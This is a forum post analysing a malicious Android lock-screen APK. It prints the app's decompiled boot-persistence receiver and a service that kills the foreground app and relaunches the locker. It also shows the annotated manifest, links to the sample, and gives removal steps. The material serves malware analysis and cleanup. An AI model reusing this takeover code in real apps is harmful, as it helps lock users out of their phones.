夺命锁apk恶意程序简单分析
本帖最后由 轩少 于 2014-9-11 20:47 编辑
文件相关信息:
C:\Documents and Settings\Administrator\桌面\夺命锁\1.apk
大小: 33528 字节
修改时间: 2014年7月8日, 15:05:48
MD5: EB447AF6B1824530FE63359A33467B13
SHA1: A5D9C553A7706A6A88C16F2221268C1B4A98A906
CRC32: F19DD189
因为这是本论坛一位用户发的样本,我以前也见过,差点被阴了。。
帖子地址:http://www.52pojie.cn/thread-271399-1-1.html
样本下载地址:http://www.52pojie.cn/forum.php? ... DM1fDI3MTM5OQ%3D%3D
使用工具:AXMLPrinter2
dex2jar
jd_Gui
XMLView(不想用记事本的可以用它查看翻译后的XML文档,记得把.txt后缀改为.xml)
1.使用解压软件右键解压得到以下文件:
2.下载dex2jar工具解压:
把classes.dex 拷贝到dex2jar目录下,在该目录的地址栏输入cmd打开命令行,再输入:dex2jar.bat classes.dex 回车后
得到文件:classes_dex2jar.jar
3.使用jd_Gui打开刚才得到classes_dex2jar.jar文件:
4.查看具体代码:
BootBroadcastReceiver代码如下:
package tk.jianmo.study;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
/**
 * Persistence entry point of the sample (decompiled output; indentation restored for readability).
 * The manifest registers this receiver for BOOT_COMPLETED and several connectivity / Wi-Fi
 * broadcasts, and onReceive never inspects the delivered action, so every broadcast that matches
 * the manifest filter takes the same path and relaunches MainActivity.
 */
public class BootBroadcastReceiver extends BroadcastReceiver
{
  // Declared but never read in this class; the effective filter is the <intent-filter> in the manifest.
  String action_boot = "android.intent.action.BOOT_COMPLETED";

  /**
   * Starts MainActivity in a new task.
   *
   * @param paramContext receiver context used to build and fire the intent
   * @param paramIntent  the matched broadcast; its action is ignored
   * @throws NoClassDefFoundError if MainActivity cannot be resolved by name (the
   *         ClassNotFoundException is re-thrown with its message only, cause dropped)
   */
  @Override
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    try
    {
      // Likely a decompiler rendering of a MainActivity.class literal rather than deliberate reflection.
      Class localClass = Class.forName("tk.jianmo.study.MainActivity");
      Intent localIntent = new Intent(paramContext, localClass);
      // 268435456 == 0x10000000 == Intent.FLAG_ACTIVITY_NEW_TASK, needed to start an activity from a receiver context.
      localIntent.addFlags(268435456);
      paramContext.startActivity(localIntent);
      return;
    }
    catch (ClassNotFoundException localClassNotFoundException)
    {
      NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
      throw localNoClassDefFoundError;
    }
  }
}
BuildConfig代码如下:
/**
 * Build-tool generated constants. DEBUG == true, matching android:debuggable="true" in the
 * manifest: the sample was shipped as a debug build, which makes it straightforward to attach
 * a debugger to or inspect at runtime during analysis.
 */
public final class BuildConfig
{
  public static final boolean DEBUG = true;
}
R文件代码如下:
package tk.jianmo.study;
/**
 * aapt-generated resource identifiers (0x7f packages the app's own resources; the next byte is the
 * resource type, the low 16 bits the entry). The manifest references two of these directly:
 * android:label="@7F040001" is string.app_name and android:icon="@7F020002" is drawable.ic_launcher.
 * Drawables d1, d2, sp and mybutton live under res/ and are presumably the lock-screen artwork
 * described in the write-up — confirm against the extracted resources.
 */
public final class R
{
  // No custom attributes declared.
  public static final class attr
  {
  }
  // 0x7f020000.. : drawables referenced by the UI.
  public static final class drawable
  {
    public static final int d1 = 2130837504;
    public static final int d2 = 2130837505;
    public static final int ic_launcher = 2130837506;
    public static final int mybutton = 2130837507;
    public static final int sp = 2130837508;
  }
  // 0x7f050000.. : view ids; mainTextViewTime presumably shows a countdown, but MainActivity is not on this page.
  public static final class id
  {
    public static final int bn_bf = 2131034112;
    public static final int bn_hy = 2131034113;
    public static final int mainTextViewTime = 2131034114;
  }
  // 0x7f030000 : the single layout; the write-up notes AXMLPrinter2 recovered only the XML prolog from main.xml.
  public static final class layout
  {
    public static final int main = 2130903040;
  }
  // 0x7f040000.. : string resources.
  public static final class string
  {
    public static final int app_name = 2130968577;
    public static final int hello = 2130968576;
  }
}
killpoccessserve代码如下:
package tk.jianmo.study;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningTaskInfo;
import android.app.Service;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Handler;
import android.os.Handler.Callback;
import android.os.IBinder;
import android.os.Message;
import java.util.List;
import java.util.Timer;
import java.util.TimerTask;
/**
 * Foreground-takeover service (decompiled output; indentation restored for readability).
 * On creation it starts a Timer that periodically posts to a Handler; the Handler reads the
 * top running task and, per the manifest annotation on this page, relaunches MainActivity and
 * kills the other package's background processes whenever the top task is not the sample itself.
 * Requires the GET_TASKS and KILL_BACKGROUND_PROCESSES permissions the manifest requests.
 * The Timer is never cancelled (onDestroy does nothing beyond the super call), so the polling
 * runs for as long as the service process lives.
 */
public class killpoccessserve extends Service
{
  // Set to the service itself in onCreate and read from the anonymous Handler.Callback.
  Context context;

  /** Not a bound service: always returns null. */
  @Override
  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }

  /**
   * Wires up the polling loop: a Timer thread posts a message to a Handler created here, so the
   * activity launch and process kill execute on the thread that created the Handler
   * (Service.onCreate normally runs on the main thread).
   */
  @Override
  public void onCreate()
  {
    this.context = this;
    Handler.Callback local100000000 = new Handler.Callback()
    {
      /**
       * One poll. Decompiler artifact: as written, the empty-bodied `if` followed by a
       * `while (true)` whose first statement is `return false` makes the relaunch/kill block
       * unreachable. The original bytecode presumably returns early when the top package is
       * tk.jianmo.study and otherwise falls into the relaunch/kill block below.
       *
       * @throws NoClassDefFoundError if MainActivity cannot be resolved (message only, cause dropped)
       */
      public boolean handleMessage(Message paramAnonymousMessage)
      {
        ActivityManager localActivityManager = (ActivityManager)killpoccessserve.this.context.getSystemService("activity");
        // Package of the top activity of the most recent task; needs GET_TASKS (see manifest).
        String str = ((ActivityManager.RunningTaskInfo)localActivityManager.getRunningTasks(1).get(0)).topActivity.getPackageName();
        if (str.equals("tk.jianmo.study"));
        while (true)
        {
          return false;
          Intent localIntent = new Intent();
          Context localContext = killpoccessserve.this.context;
          try
          {
            // Likely a decompiler rendering of a MainActivity.class literal.
            Class localClass = Class.forName("tk.jianmo.study.MainActivity");
            localIntent.setClass(localContext, localClass);
            // 67108864 == 0x04000000 == Intent.FLAG_ACTIVITY_CLEAR_TOP
            localIntent.setFlags(67108864);
            // 268435456 == 0x10000000 == Intent.FLAG_ACTIVITY_NEW_TASK
            localIntent.addFlags(268435456);
            killpoccessserve.this.startActivity(localIntent);
            // Evicts the foreground app's background processes; needs KILL_BACKGROUND_PROCESSES (see manifest).
            localActivityManager.killBackgroundProcesses(str);
          }
          catch (ClassNotFoundException localClassNotFoundException)
          {
            NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
            throw localNoClassDefFoundError;
          }
        }
      }
    };
    Handler localHandler = new Handler(local100000000);
    Timer localTimer = new Timer();
    TimerTask local100000001 = new TimerTask() // periodic task
    {
      // Decompiler artifact: synthetic field holding the captured localHandler; its initialisation is not shown here.
      private final Handler val$h;

      /** Posts an empty message so handleMessage above runs on the Handler's thread. */
      @Override
      public void run()
      {
        this.val$h.obtainMessage().sendToTarget();
      }
    };
    // Decompiler rendered the millisecond period as a char literal: '–' is U+2013, i.e. a period of
    // 8211 ms, assuming the character survived the forum's encoding intact — TODO confirm against the dex.
    localTimer.schedule(local100000001, 0, '–');
  }

  /** Does not cancel the Timer started in onCreate. */
  @Override
  public void onDestroy()
  {
    super.onDestroy();
  }

  /** Legacy start hook (deprecated in favour of onStartCommand since API 5); no extra work here. */
  @Override
  public void onStart(Intent paramIntent, int paramInt)
  {
    super.onStart(paramIntent, paramInt);
  }
}
经过AXMLPrinter2翻译后的main.xml代码就一行,
<?xml version="1.0" encoding="utf-8"?>
经过AXMLPrinter2翻译后的AndroidManifest.xml的代码如下:
<?xml version="1.0" encoding="utf-8"?>
<manifest
xmlns:android="http://schemas.android.com/apk/res/android"
android:versionCode="1"
android:versionName="3.0"
package="tk.jianmo.study"
>
<uses-sdk
android:minSdkVersion="8"
android:targetSdkVersion="11"
>
</uses-sdk>
<application
android:label="@7F040001"
android:icon="@7F020002"
android:debuggable="true"
>
<service
android:name=".killpoccessserve"//这个服务会循环检测当前的顶层程序是不是自己,如果不是自己,就杀掉它,并启动自己
>
</service>
/>
<activity
android:theme="@android:01030007"
android:label="@7F040001"
android:name=".MainActivity"
>
<intent-filter
>
<action
android:name="android.intent.action.MAIN"
>
</action>
<category
android:name="android.intent.category.LAUNCHER"
>
</category>
</intent-filter>
</activity>
<receiver
android:name=".BootBroadcastReceiver"//实现开机自启
>
<intent-filter
>
<action
android:name="android.intent.action.BOOT_COMPLETED"//开机广播(开机自启)
>
</action>
<action
android:name="android.intent.action.BOOT_COMPLETED"//开机广播(开机自启)
>
</action>
<action
android:name="android.intent.ACTION_SCREEN_OFF"//关机广播(应该是倒计时关机的)
>
</action>
<action
android:name="android.net.conn.CONNECTIVITY_CHANGE"//监听网络变化
>
</action>
<action
android:name="android.net.wifi.WIFI_STATE_CHANGED"//监听WIFI变化
>
</action>
<action
android:name="android.net.wifi.STATE_CHANGE"//检测WIFI状态
>
</action>
<category
android:name="android.intent.category.HOME"//更换安卓桌面
>
</category>
</intent-filter>
</receiver>
</application>
<uses-permission
android:name="android.permission.ACCESS_WIFI_STATE"//允许程序访问Wi-Fi网络状态信息
>
</uses-permission>
<uses-permission
android:name="android.permission.CHANGE_WIFI_STATE"//改变WIFI状态
>
</uses-permission>
<uses-permission
android:name="android.permission.RECEIVE_BOOT_COMPLETED"//允许程序接收到 ACTION_BOOT_COMPLETED广播在系统完成启动(开机自启)
>
</uses-permission>
<uses-permission
android:name="android.permission.KILL_BACKGROUND_PROCESSES"//关闭后台程序
>
</uses-permission>
<uses-permission
android:name="android.permission.GET_TASKS"//检索正在运行的应用
>
</uses-permission>
<uses-permission
android:name="android.permission.WAKE_LOCK"//阻止手机进入休眠状态
>
</uses-permission>
</manifest>
小结:通过AndroidManifest.xml等,我们不难看出,这款APP索取了:开机自启、检测当前运行程序、关闭后台、前台程序、禁止系统进入休眠状态等权限,但它的性质终究是款恶作剧软件,它的锁屏界面保存在\res\文件夹下,它在打开的同时设定了一个定时任务(关机),并且实现开机自启,后台自启,想干掉它还是很容易的。
清理它的方法很多,在这里举几个例子:
1.进入recovery模式做双WIPE操作(谨慎!仅在手机中没有重要文件时可用!)
2.用手机助手PC端的程序清理
3.小米系统先按主屏键3秒然后杀掉进程再卸载(未测试……)
【另:感谢JJ师傅……】